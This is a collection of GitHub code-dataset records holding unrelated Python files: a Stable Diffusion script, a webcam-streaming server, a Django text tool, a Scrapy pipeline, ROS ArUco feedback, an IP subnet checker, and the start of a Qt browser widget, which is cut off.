'stabilityai/stable-diffusion-2-1'\n\n text_encoder = CLIPTextModel.from_pretrained(\n model_path,\n subfolder=\"text_encoder\",\n #revision=\"fp16\"\n )\n text_encoder.to(dtype=torch.float16)\n\n\n tokenizer = CLIPTokenizerWithEmbeddings.from_pretrained(model_path, subfolder=\"tokenizer\")\n\n\n tokenizer.load_embedding('', './data/FloralMarble-400.pt', text_encoder)\n\n # important: version 2.1 768 doesnt work with the scheduler: scheduler = DDIMScheduler(beta_start=0.00085, beta_end=0.012, beta_schedule=\"scaled_linear\", clip_sample=False, set_alpha_to_one=False)\n # the 2.1-base does\n pipe = StableDiffusionPipeline.from_pretrained(model_path, tokenizer=tokenizer, text_encoder=text_encoder, safety_checker=None, torch_dtype=torch.float16).to(\"cuda\")\n\n\n #pipe.scheduler = DPMSolverMultistepScheduler.from_config(pipe.scheduler.config)\n #pipe.scheduler = LMSDiscreteScheduler.from_config(pipe.scheduler.config)\n pipe.scheduler = EulerDiscreteScheduler.from_config(pipe.scheduler.config)\n #pipe.scheduler = DDIMScheduler.from_config(pipe.scheduler.config)\n\n print(pipe.scheduler.config.prediction_type) # should be 'v_prediction' for 768 version\n\n\n g_cuda = torch.Generator(device='cuda')\n seed = 1965858791\n g_cuda.manual_seed(seed)\n\n\n prompt = \"skulpture of greek warrior in helmet, , red colors, fire\"\n negative_prompt = \"\" \n\n num_samples = 1\n guidance_scale = 7\n num_inference_steps = 50\n height = 768 #768 # 512\n width = 768 #768 # 512\n\n\n # DONT use torch.autocast(\"cuda\") here to fix black blank images\n with torch.inference_mode():\n images = pipe(\n prompt,\n height=height,\n width=width,\n negative_prompt=negative_prompt,\n num_images_per_prompt=num_samples,\n num_inference_steps=num_inference_steps,\n guidance_scale=guidance_scale,\n generator=g_cuda\n ).images\n\n for i, img in enumerate(images):\n img.save(f'./data/{i}.png')","repo_name":"pkurzend/stable-diffusion-scripts","sub_path":"CLIPTokenizerWithEmbeddings.py","file_name":"CLIPTokenizerWithEmbeddings.py","file_ext":"py","file_size_in_byte":9415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19500586108","text":"import click\nimport struct\nimport subprocess\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.internet.endpoints import serverFromString\nfrom twisted.internet.protocol import (\n ProcessProtocol,\n Protocol,\n ServerFactory,\n)\n\nfrom . import util\n\n\nclass CameraProtocol(ProcessProtocol):\n def __init__(self, sp):\n self.sp = sp\n\n def connectionMade(self):\n # So we can see what we are sending\n self.mpvp = subprocess.Popen('mpv -', stdin=subprocess.PIPE, shell=True)\n\n def outReceived(self, data):\n self.sp.transport.write(data)\n try:\n self.mpvp.stdin.write(data)\n except IOError:\n pass # Only our side failing\n\nclass SendProtocol(Protocol):\n def connectionMade(self):\n click.echo('recipient connected')\n cp = CameraProtocol(self)\n self.cpt = self.factory.reactor.spawnProcess(cp, 'ffmpeg', util.ffmpeg_args())\n\n def connectionLost(self, reason):\n click.echo('recipient disconnected')\n self.cpt.loseConnection()\n self.factory.client_disconnected()\n\nclass RecvProtocol(Protocol):\n def connectionMade(self):\n click.echo('sender connected')\n self.mpvp = subprocess.Popen('mpv -', stdin=subprocess.PIPE, shell=True)\n\n def dataReceived(self, data):\n try:\n self.mpvp.stdin.write(data)\n except IOError:\n self.transport.loseConnection()\n\n def connectionLost(self, reason):\n click.echo('sender disconnected')\n self.mpvp.terminate()\n\nclass SendFactory(ServerFactory):\n protocol = SendProtocol\n\n def __init__(self, reactor, *args):\n self.reactor = reactor\n self.args = args\n\n def client_disconnected(self):\n self.reactor.callLater(1, get_client, self.reactor, *self.args)\n\nclass RecvFactory(ServerFactory):\n protocol = RecvProtocol\n\n@inlineCallbacks\ndef run_server(reactor, addr, send_port, recv_port):\n sep = serverFromString(reactor, 'tcp:%d' % send_port)\n sep.listen(SendFactory(reactor, addr, send_port, recv_port))\n\n rep = serverFromString(reactor, 'tcp:%d' % recv_port)\n rep.listen(RecvFactory())\n\n yield get_client(reactor, addr, send_port, recv_port)\n\n@util.wormholeProto()\n@inlineCallbacks\ndef get_client(_, w, addr, send_port, recv_port):\n code = yield w.get_code()\n click.echo('Give this code to the client: %s' % code)\n yield w.get()\n yield w.send(addr.encode('UTF8'))\n yield w.send(struct.pack('>H', send_port))\n yield w.send(struct.pack('>H', recv_port))\n","repo_name":"alecmuffett/videonion","sub_path":"videonion/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"6817163474","text":"import time\nfrom datetime import datetime\n\nimport numpy as np\n\n\ndef apartment_into(features, apartment, model=None):\n for feature, value in zip(features, apartment):\n if feature == \"soldDate\":\n dt_object = datetime.fromtimestamp(value)\n print(feature + \": {:.2f}\".format(value) + \" (corresponds to date: \" + str(dt_object.date()) + \")\")\n else:\n print(feature + \": {:.2f}\".format(value))\n if model is not None:\n area_index = np.where(features == \"livingArea\")[0][0]\n area = apartment[area_index]\n t0 = time.time()\n price = model.predict(apartment)\n print(\"It took {:.1f} ms to predict the prize.\".format(1000 * (time.time() - t0)))\n print(\n \"Predicted apartment price at sold date is {:.1f} Msek. Corresponds to {:.1f} ksek/m2.\".format(\n price / 10**6, price / (area * 10**3)\n )\n )\n time_index = np.where(features == \"soldDate\")[0][0]\n apartment_current_time = apartment.copy()\n apartment_current_time[time_index] = datetime.now().timestamp()\n price = model.predict(apartment_current_time)\n print(\n \"Predicted apartment price now is {:.1f} Msek. Corresponds to {:.1f} ksek/m2.\\n\".format(\n price / 10**6, price / (area * 10**3)\n )\n )\n\n else:\n print(\"\")\n","repo_name":"JohanSchott/apartment_prices","sub_path":"apartment_prices/disp.py","file_name":"disp.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3261645106","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef home(request):\n return render(request,'index.html')\n\ndef analyze(request):\n # Get the text\n djtext = request.POST.get('text', 'default')\n removepunc=request.POST.get('removepunccc','off')\n capalize=request.POST.get('capson','off')\n countchar=request.POST.get('countch','off')\n vowelss=request.POST.get('vowelsss','off')\n# ------------------------------------------------------------------------\n if removepunc == \"on\":\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n analyzed = \"\"\n for char in djtext:\n if char not in punctuations:\n analyzed = analyzed + char\n params = {'purpose': 'Removed Punctuations', 'analyzed_text': analyzed}\n djtext = analyzed\n # return render(request, 'analyzed.html', params)\n# ---------------------------------------------------------------------------------\n if(capalize==\"on\"):\n analyzed=\"\"\n for char in djtext:\n analyzed=analyzed+char.upper()\n params = {'purpose': 'Changed To UpperCase', 'analyzed_text': analyzed}\n djtext = analyzed\n # return render(request, 'analyzed.html', params)\n \n# ----------------------------------------------------------------------------------- \n if(countchar==\"on\"):\n analyzedd=0\n for char in djtext:\n analyzedd=len(djtext)\n params = {'purpose': 'Here is Your Total Character ', 'analyzed_text': analyzedd}\n \n # return render(request, 'analyzed.html', params)\n#-------------------------------------------------------------------------------------- \n if(vowelss==\"on\"):\n analyzed1=0\n for char in djtext:\n if(char=='a' or char=='e' or char=='i' or char=='o' or char=='u' or char=='A' or char=='E' or char=='I' or char=='O' or char=='U'):\n analyzed1=analyzed1+1\n params = {'purpose': 'Counting the vowels', 'analyzed_text': analyzed1}\n \n#--------------------------------------------------------------------------------------\n if(removepunc != \"on\" and capalize!=\"on\" and countchar!=\"on\" and vowelss!='on'):\n return HttpResponse('''Select Some Toggle Keys😋


Back''')\n if(countchar=='on' and vowelss=='on'):\n params = {'purpose': 'Counting the Charactrs & vowels','analyzed_text':analyzedd, 'analyzed_textt': analyzed1}\n if(removepunc=='on' and vowelss=='on'):\n params = {'purpose': 'Removed Punctuations and counted vowels','analyzed_text':analyzed, 'analyzed_textt': analyzed1}\n if(capalize=='on' and countchar=='on'):\n params = {'purpose': 'UpperCase and counted characters','analyzed_text':analyzed, 'analyzed_textt': analyzedd}\n if(capalize=='on' and vowelss=='on'):\n params = {'purpose': 'UpperCase and vowels ','analyzed_text':analyzed, 'analyzed_textt': analyzed1}\n if(capalize=='on' and vowelss=='on' and countchar=='on'):\n params = {'purpose': 'UpperCase && vowels && characters','analyzed_text':analyzed, 'analyzed_textt': analyzed1,'analyzed_texttt': analyzedd}\n \n return render(request, 'analyzed.html', params)\n ","repo_name":"MdRaashidit/TextUtility","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19966542462","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\n# 添加必备包和加载设置\nimport pymongo\nfrom scrapy.utils.project import get_project_settings\n\nsettings = get_project_settings()\n\n\nclass NewsdataPipeline:\n # class中全部替换\n def __init__(self):\n host = settings[\"MONGODB_HOST\"]\n port = settings[\"MONGODB_PORT\"]\n dbname = settings[\"MONGODB_DATABASE\"]\n sheetname = settings[\"MONGODB_TABLE\"]\n #username = settings[\"MONGODB_USER\"]\n #password = settings[\"MONGODB_PASSWORD\"]\n # 创建MONGODB数据库链接\n #client = pymongo.MongoClient(host=host, port=port, username=username, password=password)\n client = pymongo.MongoClient(host=host, port=port)\n # 指定数据库\n mydb = client[dbname]\n # 存放数据的数据库表名\n self.post = mydb[sheetname]\n\n def process_item(self, item, spider):\n data = dict(item)\n # 数据写入\n self.post.insert_one(data)\n return item\n\n","repo_name":"Millastar/Spark-composition-website-Data-crawling","sub_path":"NewsData/NewsData/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14135779223","text":"\"\"\"A collection of modules for iterating through different kinds of\ntree, generating tokens identical to those produced by the tokenizer\nmodule.\n\nTo create a tree walker for a new type of tree, you need to do\nimplement a tree walker object (called TreeWalker by convention) that\nimplements a 'serialize' method taking a tree as sole argument and\nreturning an iterator generating tokens.\n\"\"\"\n\ntreeWalkerCache = {}\n\ndef getTreeWalker(treeType, implementation=None, **kwargs):\n \"\"\"Get a TreeWalker class for various types of tree with built-in support\n\n treeType - the name of the tree type required (case-insensitive). Supported\n values are \"simpletree\", \"dom\", \"etree\" and \"beautifulsoup\"\n\n \"simpletree\" - a built-in DOM-ish tree type with support for some\n more pythonic idioms.\n \"dom\" - The xml.dom.minidom DOM implementation\n \"pulldom\" - The xml.dom.pulldom event stream\n \"etree\" - A generic walker for tree implementations exposing an\n elementtree-like interface (known to work with\n ElementTree, cElementTree and lxml.etree).\n \"lxml\" - Optimized walker for lxml.etree\n \"beautifulsoup\" - Beautiful soup (if installed)\n \"genshi\" - a Genshi stream\n\n implementation - (Currently applies to the \"etree\" tree type only). A module\n implementing the tree type e.g. xml.etree.ElementTree or\n cElementTree.\"\"\"\n\n treeType = treeType.lower()\n if treeType not in treeWalkerCache:\n if treeType in (\"dom\", \"pulldom\", \"simpletree\"):\n mod = __import__(treeType, globals())\n treeWalkerCache[treeType] = mod.TreeWalker\n elif treeType == \"genshi\":\n import genshistream\n treeWalkerCache[treeType] = genshistream.TreeWalker\n elif treeType == \"beautifulsoup\":\n import soup\n treeWalkerCache[treeType] = soup.TreeWalker\n elif treeType == \"lxml\":\n import lxmletree\n treeWalkerCache[treeType] = lxmletree.TreeWalker\n elif treeType == \"etree\":\n import etree\n # XXX: NEVER cache here, caching is done in the etree submodule\n return etree.getETreeModule(implementation, **kwargs).TreeWalker\n return treeWalkerCache.get(treeType)\n","repo_name":"livid/v2ex-gae","sub_path":"html5lib/treewalkers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":3095,"dataset":"github-code","pt":"53"} +{"seq_id":"72040224487","text":"import torch.distributions as td\nimport torch\nimport math\nfrom gpytorch.utils.transforms import inv_softplus\n\nfrom .base import Prior\nfrom .loc_scale import Normal, Laplace, StudentT, GenNorm, ConvCorrelatedNormal\nfrom .transformed import Gamma, Uniform, HalfCauchy\n\n\n__all__ = ('NormalGamma', 'NormalUniform', 'Horseshoe', 'LaplaceGamma',\n 'LaplaceUniform', 'StudentTGamma', 'StudentTUniform',\n 'GenNormUniform', 'ConvCorrNormalGamma')\n\n\nclass NormalGamma(Normal):\n def __init__(self, shape, loc, scale, rate=1., gradient_clip=1.):\n scale_prior = Gamma(shape=[], concentration=scale, rate=rate)\n with torch.no_grad():\n scale_prior.p.data = inv_softplus(torch.tensor(scale))\n super().__init__(shape, loc, scale_prior)\n\n\nclass NormalUniform(Normal):\n def __init__(self, shape, loc, scale, gradient_clip=1.):\n scale_prior = Uniform(shape=[], low=0., high=scale*2.)\n with torch.no_grad():\n scale_prior.p.data = torch.tensor(0.)\n super().__init__(shape, loc, scale_prior)\n \n \nclass ConvCorrNormalGamma(ConvCorrelatedNormal):\n def __init__(self, shape, loc, scale, lengthscale=1., rate=1.):\n lengthscale_prior = Gamma(shape=[], concentration=lengthscale, rate=rate)\n scale_prior = Gamma(shape=[], concentration=scale, rate=rate)\n with torch.no_grad():\n lengthscale_prior.p.data = inv_softplus(torch.tensor(lengthscale))\n scale_prior.p.data = inv_softplus(torch.tensor(scale))\n super().__init__(shape, loc, scale=scale_prior, lengthscale=lengthscale_prior)\n\n \nclass LaplaceGamma(Laplace):\n def __init__(self, shape, loc, scale, rate=1., gradient_clip=1.):\n scale_prior = Gamma(shape=[], concentration=scale, rate=rate)\n with torch.no_grad():\n scale_prior.p.data = inv_softplus(torch.tensor(scale))\n super().__init__(shape, loc, scale_prior)\n\n \nclass LaplaceUniform(Laplace):\n def __init__(self, shape, loc, scale, gradient_clip=1.):\n scale_prior = Uniform(shape=[], low=0., high=scale*2.)\n with torch.no_grad():\n scale_prior.p.data = torch.tensor(0.)\n super().__init__(shape, loc, scale_prior)\n\n\nclass StudentTGamma(StudentT):\n def __init__(self, shape, loc, scale, rate=1., df=2, gradient_clip=1.):\n scale_prior = Gamma(shape=[], concentration=scale, rate=rate)\n with torch.no_grad():\n scale_prior.p.data = inv_softplus(torch.tensor(scale))\n super().__init__(shape, loc, scale_prior, df=df)\n\n \nclass StudentTUniform(StudentT):\n def __init__(self, shape, loc, scale, df=2, gradient_clip=1.):\n scale_prior = Uniform(shape=[], low=0., high=scale*2.)\n with torch.no_grad():\n scale_prior.p.data = torch.tensor(0.)\n super().__init__(shape, loc, scale_prior, df=df)\n \n \nclass GenNormUniform(GenNorm):\n def __init__(self, shape, loc, scale, beta=1., gradient_clip=1.):\n beta_prior = Uniform(shape=[], low=0., high=beta*2.)\n with torch.no_grad():\n beta_prior.p.data = torch.tensor(0.)\n super().__init__(shape, loc, scale, beta=beta_prior)\n\n \nclass Horseshoe(Normal):\n def __init__(self, shape, loc, scale, hyperscale=1., gradient_clip=1.):\n scale_prior = HalfCauchy(shape=[], scale=hyperscale, multiplier=scale)\n with torch.no_grad():\n scale_prior.p.data = inv_softplus(torch.tensor(1.))\n super().__init__(shape, loc, scale_prior)\n","repo_name":"ratschlab/bnn_priors","sub_path":"bnn_priors/prior/hierarchical.py","file_name":"hierarchical.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"27495144993","text":"m:int ; n: int\n\nm = int(input(\"Qual a quantidade de linhas da matriz? \"))\nn = int(input(\"Qual a quantidade de colunas da matriz? \"))\n\nmatriz: [[int]] = [[0 for x in range(n)] for x in range(m)]\n\nfor i in range(m):\n\tfor j in range(n):\n\t\tmatriz[i][j] = int(input(f\"Elemento [{i},{j}]: \"))\n\nprint(\"VALORES NEGATIVOS:\")\n\nfor i in range(m):\n\tfor j in range(n):\n\t\tif matriz[i][j] < 0:\n\t\t\tprint(matriz[i][j])","repo_name":"acenelio/curso-algoritmos","sub_path":"python/negativos_matriz.py","file_name":"negativos_matriz.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"pt","doc_type":"code","stars":363,"dataset":"github-code","pt":"53"} +{"seq_id":"42713292707","text":"# _*_ coding: utf-8 _*_\n__author__ = 'rentingsong'\n__date__ = '2020/12/29 21:45'\n\"\"\"\nfunction: 判断两个IP是否是同一局域网\nversion: 1.0\n原理: 如果两个IP的网络标识是一样的,则这两个IP属于同一局域网\n\"\"\"\nfrom flask import render_template\nfrom flask import request\nfrom LAN import LAN_blue\n\n\ndef decimal_to_binary(decimal):\n \"\"\"\n 将一个十进制数转换为二进制数\n :param decimal: 十进制数\n :return: 十进制数转换为二进制的01字符串\n \"\"\"\n tmp = list()\n while decimal != 0:\n tmp.append(decimal % 2)\n decimal = decimal // 2\n tmp.reverse()\n res = \"\".join([str(num) for num in tmp])\n if len(res) < 8:\n res = \"\".join([(\"0\" * (8 - len(res))), res])\n return res\n\n\ndef bitwise_and(str1, str2):\n \"\"\"\n 将两个01字符串按位与,例如11110000 & 11111111 = 11110000\n :param str1: 11110000\n :param str2: 11111111\n :return: 11110000\n \"\"\"\n # 按位与存到临时变量tmp\n tmp = list(map(lambda x, y: int(x) and int(y), str1, str2))\n # 将整数数组转换为字符数组\n res = [str(x) for x in tmp]\n return \"\".join(res)\n\n\ndef bitwise_negation(my_string, x, y):\n \"\"\"\n 字符串按位取反,比如10101010,取反之后为01010101\n :param my_string: 原始字符串,例如10101010\n :param x: 字符,1\n :param y: 字符,2\n :return: 返回取反之后的字符串,例如:01010101\n \"\"\"\n return my_string.replace(x, \"tmp\").replace(y, x).replace(\"tmp\", y)\n\n\ndef deal_address_and_mask(address, mask):\n \"\"\"\n 返回IP地址和掩码转换为二进制之后的值\n :param address: IPV4地址\n :param mask: 掩码\n :return: ip_address_to_bin, subnet_mask_to_bin\n \"\"\"\n ip_address_to_bin = list()\n subnet_mask_to_bin = list()\n for i in address.split('.'): # 将IP地址分割,每一位进行二进制转换\n # print(\"IP 地址{0}\".format(i))\n # print(\"IP 二进制{0}\".format(decimal_to_binary(int(i))))\n ip_address_to_bin.append(decimal_to_binary(int(i)))\n for i in mask.split('.'):\n # print(\"掩码{0}\".format(i))\n # print(\"掩码 二进制{0}\".format(decimal_to_binary(int(i))))\n subnet_mask_to_bin.append(decimal_to_binary(int(i)))\n return ip_address_to_bin, subnet_mask_to_bin\n\n\n@LAN_blue.route('/lan_index')\ndef lan_index():\n return render_template('LAN/LAN_index.html')\n\n\n@LAN_blue.route('/judge_lan', methods=['GET', 'POST'])\ndef judge_lan():\n if request.method == \"POST\":\n # 获取IP1地址和掩码并解析: 将地址和掩码分别用点号分割,一个一个进行二进制转换,保存到数组中\n ip_address1 = request.form['ip_address1']\n print(\"输入的IP地址1:{0}\".format(ip_address1))\n subnet_mask1 = request.form['subnet_mask1']\n print(\"输入的掩码1:{0}\".format(subnet_mask1))\n ip_address1_to_bin, subnet_mask1_to_bin = deal_address_and_mask(ip_address1, subnet_mask1)\n print(\"IP地址1转换为二进制:{0}\".format(ip_address1_to_bin))\n print(\"掩码1转换为二进制:{0}\".format(subnet_mask1_to_bin))\n\n # 求IPV4地址1的网络标识\n address1_net_id = list()\n for i in range(0, 4):\n print(\"ip {0} and mask {1} : {2}\".format(ip_address1_to_bin[i], subnet_mask1_to_bin[i], bitwise_and(ip_address1_to_bin[i], subnet_mask1_to_bin[i])))\n address1_net_id.append(bitwise_and(ip_address1_to_bin[i], subnet_mask1_to_bin[i]))\n print(\"网络标识{0}\".format(address1_net_id))\n\n # 求IP1主机标识: ip & 掩码取反\n print(\"子网掩码1{0}\".format(subnet_mask1_to_bin))\n subnet_mask1_reverse = list()\n for ele in subnet_mask1_to_bin:\n subnet_mask1_reverse.append(bitwise_negation(ele, \"1\", \"0\"))\n print(\"子网掩码1取反{0}\".format(subnet_mask1_reverse))\n host1_id = list() # 主机标识\n for i in range(0, 4):\n host1_id.append(bitwise_and(ip_address1_to_bin[i], subnet_mask1_reverse[i]))\n print(\"主机1标识{0}\".format(host1_id))\n\n # 获取IP2地址和掩码并解析:将地址和掩码分别用点号分割,一个一个进行二进制转换,保存到数组中\n ip_address2 = request.form['ip_address2']\n subnet_mask2 = request.form['subnet_mask2']\n ip_address2_to_bin, subnet_mask2_to_bin = deal_address_and_mask(ip_address2, subnet_mask2)\n # 求IPV4地址2的网络标识\n address2_net_id = list()\n for i in range(0, 4):\n address2_net_id.append(bitwise_and(ip_address2_to_bin[i], subnet_mask2_to_bin[i]))\n # 求IP2主机标识\n subnet_mask2_reverse = list()\n for ele in subnet_mask2_to_bin:\n subnet_mask2_reverse.append(bitwise_negation(ele, \"1\", \"0\"))\n print(\"子网掩码2取反{0}\".format(subnet_mask1_reverse))\n host2_id = list() # 主机标识\n for i in range(0, 4):\n host2_id.append(bitwise_and(ip_address2_to_bin[i], subnet_mask2_reverse[i]))\n print(\"主机2标识{0}\".format(host2_id))\n\n msg = \"是同一局域网\"\n if address1_net_id == address2_net_id:\n msg = \"网络标识一样,是同一局域网!\"\n else:\n msg = \"网络标识不一样,不是同一局域网!\"\n\n return render_template('LAN/LAN_index.html', ip_address1=ip_address1, subnet_mask1=subnet_mask1,\n ip_address1_to_bin=ip_address1_to_bin, address1_net_id=address1_net_id, host1_id=host1_id,\n ip_address2=ip_address2, subnet_mask2=subnet_mask2, host2_id=host2_id,\n ip_address2_to_bin=ip_address2_to_bin, address2_net_id=address2_net_id,\n subnet_mask1_to_bin=subnet_mask1_to_bin, subnet_mask2_to_bin=subnet_mask2_to_bin, msg=msg)\n\n\nif __name__ == \"__main__\":\n # print(decimal_to_binary(253))\n pass\n","repo_name":"pine-r/tools-python","sub_path":"LAN/LAN.py","file_name":"LAN.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36872751362","text":"import unittest\nimport os\nfrom lz77 import LZ77\n\n\nclass TestLZ77Coding(unittest.TestCase):\n def setUp(self):\n self.path = os.path.join(os.getcwd(), \"kalevala.txt\")\n self.lz77 = LZ77(self.path)\n\n def test_compress_is_smaller(self):\n \"\"\"Tests if the compressed file size is at least 70 % smaller than the original file size\"\"\"\n original_file_size = os.path.getsize(os.path.join(os.getcwd(), \"kalevala.txt\"))\n compressed_file_size = os.path.getsize(os.path.join(os.getcwd(), \"lz77_compressed.bin\"))\n\n assert compressed_file_size/original_file_size <= 0.70\n\n def test_decompressed_is_same_as_original(self):\n with open(\"kalevala.txt\", \"r\", encoding=\"utf-8\")as original_file, open(\"lz77_decompressed.txt\", \"r\", encoding=\"utf-8\")as decompressed_file:\n original_string = original_file.read()\n decompressed_string = decompressed_file.read()\n\n assert original_string == decompressed_string","repo_name":"susannakinnunen/tiralabra-tiedontiivistys-algoritmit","sub_path":"src/tests/test_lz77_kalevala.py","file_name":"test_lz77_kalevala.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7218597493","text":"#!/usr/bin/env python3\n\n'''\n*****************************************************************************************\n*\n* \t\t===============================================\n* \t\t HolA Bot (HB) Theme (eYRC 2022-23)\n* \t\t===============================================\n*\n* This script should be used to implement Task 0 of HolA Bot (HB) Theme (eYRC 2022-23).\n*\n* This software is made available on an \"AS IS WHERE IS BASIS\".\n* Licensee/end user indemnifies and will keep e-Yantra indemnified from\n* any and all claim(s) that emanate from the use of the Software or\n* breach of the terms of this agreement.\n*\n*****************************************************************************************\n'''\n\n# Team ID:\t\tHB#2972\n# Author List:\t\tAbhoy, Abhijit, Harsha, Dhruv\n# Filename:\t\tfeedback.py\n# Functions:\n#\t\t\tcallback, main\n# Nodes:\t\tdetected_aruco, overhead_cam/image_raw\n\n\n######################## IMPORT MODULES ##########################\n\nimport numpy\t\t\t\t# If you find it required\nimport rospy \t\t\t\t\nfrom sensor_msgs.msg import Image \t# Image is the message type for images in ROS\nfrom cv_bridge import CvBridge\t# Package to convert between ROS and OpenCV Images\nimport cv2\t\t\t\t# OpenCV Library\nimport cv2.aruco as aruco\nimport math\t\t\t\t# If you find it required\nfrom geometry_msgs.msg import Pose2D\t# Required to publish ARUCO's detected position & orientation\n\n############################ GLOBALS #############################\n\naruco_publisher = rospy.Publisher('detected_aruco', Pose2D, queue_size=10)\naruco_msg = Pose2D()\nmarker_size=4\ntotal_markers=250\nkey=getattr(aruco,f'DICT_{marker_size}X{marker_size}_{total_markers}')\naruco_dict=aruco.Dictionary_get(key)\naruco_param=aruco.DetectorParameters_create()\n\n##################### FUNCTION DEFINITIONS #######################\n\n# NOTE : You may define multiple helper functions here and use in your code\n\ndef callback(data):\n\t# Bridge is Used to Convert ROS Image message to OpenCV image\n\tbr = CvBridge()\n\trospy.loginfo(\"receiving camera frame\")\n\tget_frame = br.imgmsg_to_cv2(data, \"mono8\")\t\t# Receiving raw image in a \"grayscale\" format\n\tcurrent_frame = cv2.resize(get_frame, (500, 500), interpolation = cv2.INTER_LINEAR)\n\tbbox,_,_=aruco.detectMarkers(get_frame,aruco_dict,parameters=aruco_param)\n\t\n\tpos=[0,0]\n\tif len(bbox)>0:\n\t\tfor i in range(4):\n\t\t\tpos[0]+=0.25*bbox[0][0][i][0]\n\t\t\tpos[1]+=0.25*bbox[0][0][i][1]\n\t\t\n\t\ty=(bbox[0][0][3][1])-(bbox[0][0][0][1])\n\t\tx=(bbox[0][0][3][0])-(bbox[0][0][0][0])\n\t\talign=math.atan2(x,y)\n\t\taruco_msg.x=pos[0]-639.5\n\t\taruco_msg.y=-pos[1]+640.5\n\t\taruco_msg.theta=align\n\t\taruco_publisher.publish(aruco_msg)\n\t############ ADD YOUR CODE HERE ############\n\n\t# INSTRUCTIONS & HELP : \n\t#\t-> Use OpenCV to find ARUCO MARKER from the IMAGE\n\t#\t-> You are allowed to use any other library for ARUCO detection, \n\t# but the code should be strictly written by your team and\n\t#\t your code should take image & publish coordinates on the topics as specified only. \n\t#\t-> Use basic high-school geometry of \"TRAPEZOIDAL SHAPES\" to find accurate marker coordinates & orientation :)\n\t#\t-> Observe the accuracy of aruco detection & handle every possible corner cases to get maximum scores !\n\n\t############################################\n\t \ndef main():\n\trospy.init_node('aruco_feedback_node') \n\trospy.Subscriber('overhead_cam/image_raw', Image, callback)\n\trospy.spin()\nif __name__ == '__main__':\n main()\n","repo_name":"arabhijit2003/eyantra_2022","sub_path":"eyrc22_hb_2972-master/eyrc-2022_hb_task2/scripts/feedback.py","file_name":"feedback.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6166912465","text":"import config, os, webbrowser, re\r\nfrom util.NetworkUtil import NetworkUtil\r\nfrom util.TextUtil import TextUtil\r\nif config.qtLibrary == \"pyside6\":\r\n from PySide6.QtWebEngineWidgets import QWebEngineView\r\n from PySide6.QtWebEngineCore import QWebEngineProfile, QWebEnginePage\r\n from PySide6.QtGui import QGuiApplication, QKeySequence, QShortcut\r\n from PySide6.QtWidgets import QVBoxLayout, QHBoxLayout, QWidget, QLineEdit\r\n from PySide6.QtCore import QUrl\r\nelse:\r\n from qtpy.QtWebEngineWidgets import QWebEngineView, QWebEngineProfile, QWebEnginePage\r\n from qtpy.QtGui import QGuiApplication\r\n from qtpy.QtWidgets import QVBoxLayout, QHBoxLayout, QWidget, QLineEdit, QShortcut\r\n from qtpy.QtCore import QUrl\r\n from qtpy.QtGui import QKeySequence\r\n\r\nclass SimpleBrowser(QWidget):\r\n\r\n def __init__(self, parent, title=\"UniqueBible.app\", profileName=\"simplebrowser\"):\r\n super().__init__()\r\n self.parent = parent\r\n self.profileName = profileName\r\n # set title\r\n self.setWindowTitle(title)\r\n # set variables\r\n self.setupVariables()\r\n # setup interface\r\n self.setupUI()\r\n # set initial window size\r\n self.resize(QGuiApplication.primaryScreen().availableSize() * 3 / 4)\r\n # setup keyboard shortcuts\r\n self.setupKeyboardShortcuts()\r\n\r\n def setupKeyboardShortcuts(self):\r\n shortcut = QShortcut(QKeySequence(\"Ctrl+F\"), self)\r\n shortcut.activated.connect(self.toggleInstantHighlight)\r\n\r\n def setupVariables(self):\r\n self.home = None\r\n self.enableInstantHighlight = False\r\n self.urlString = \"\"\r\n\r\n def setupUI(self):\r\n mainLayout = QVBoxLayout()\r\n topLayout = QHBoxLayout()\r\n secondLayout = QHBoxLayout()\r\n mainLayout.addLayout(topLayout)\r\n mainLayout.addLayout(secondLayout)\r\n self.setLayout(mainLayout)\r\n\r\n # go home button\r\n icon = \"material/action/home/materialiconsoutlined/48dp/2x/outline_home_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"homePage\"])\r\n button.clicked.connect(lambda: self.setUrl(self.home))\r\n topLayout.addWidget(button)\r\n # go back button\r\n icon = \"material/image/navigate_before/materialiconsoutlined/48dp/2x/outline_navigate_before_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"youtube_back\"])\r\n button.clicked.connect(lambda: self.webview.page().triggerAction(QWebEnginePage.Back))\r\n topLayout.addWidget(button)\r\n # go forward button\r\n icon = \"material/image/navigate_next/materialiconsoutlined/48dp/2x/outline_navigate_next_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"youtube_forward\"])\r\n button.clicked.connect(lambda: 